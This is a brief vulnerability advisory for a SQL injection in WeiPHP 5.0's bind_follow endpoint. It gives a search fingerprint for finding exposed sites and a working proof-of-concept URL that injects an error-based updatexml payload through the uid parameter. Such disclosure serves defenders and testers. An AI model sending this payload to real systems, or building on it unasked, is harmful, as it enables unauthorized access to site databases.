Weiphp5 0 Bind_follow Sql Injection Vulnerability
Weiphp5 0 Bind_follow Sql Injection Vulnerability
WeiPHP5.0 bind_follow SQL injection vulnerability
Vulnerability Description
Weiphp5.0 All SQL queries that use the wp_where() function and controllable parameters are affected, and injections exist in the front-end and back-end.
Vulnerability Impact
Weiphp5.0
Network surveying and mapping
app=”WeiPHP”
Vulnerability reappears
Login page
Verify POC
1
/public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5(%271%27),0x7e),1)--+
This post is licensed under CC BY 4.0 by the author.